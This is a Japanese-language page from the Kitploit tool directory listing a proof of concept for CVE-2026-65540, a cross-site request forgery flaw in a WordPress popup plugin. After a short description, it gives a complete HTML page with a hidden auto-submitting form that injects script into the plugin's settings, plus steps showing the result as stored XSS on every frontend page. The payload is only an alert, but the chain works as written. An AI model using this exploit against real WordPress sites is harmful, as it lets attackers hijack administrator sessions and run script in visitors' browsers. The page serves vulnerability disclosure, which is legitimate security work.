Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-65540 — Popup for CF7 with Sweet Alert <= 1.6.5 - クロスサイトリクエストフォージェリ | Kitploit
ツール/GitHubGitHub/testardou/cve-2026-65540
ウェブ脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティ
GitHubtestardou/cve-2026-65540

CVE-2026-65540

Popup for CF7 with Sweet Alert <= 1.6.5 - クロスサイトリクエストフォージェリ

リポジトリを見る
14時間33分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-65540

Popup for CF7 with Sweet Alert <= 1.6.5 - クロスサイトリクエストフォージェリ

プラグイン URL

https://wordpress.org/plugins/cf7-sweet-alert-popup/

説明

このプラグインの設定ハンドラには、nonce 検証における論理エラーがあり、すべての CSRF 保護が無効化されています。 未認証の攻撃者は、認証済みの管理者を、自動送信フォームを隠し持つ悪意のあるページにアクセスさせることでこれを悪用し、プラグイン設定を任意に変更できます。 送信された値はサニタイズされずに保存され、wp_head を介してすべてのフロントエンドページの

POC

  1. 以下の HTML ページを別のサーバーでホストします:
root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>

<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
      method="POST" id="csrf" target="hiddenframe">
  <input name="cf7simplePopupWidth" value="500;alert(document.domain)">
  <input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
  1. 管理者として WordPress にログインします
  2. 悪意のあるページにアクセスします
  3. (任意) http://TARGET/wp-admin/admin.php?page=cf7-simplepopup に移動し、Width フィールドに 500;alert(document.domain) が含まれていることを確認します
  4. 任意のフロントエンドページにアクセスすると、ブラウザで alert(document.domain) が実行され、蓄積型 XSS が確認できます
ツールをダウンロード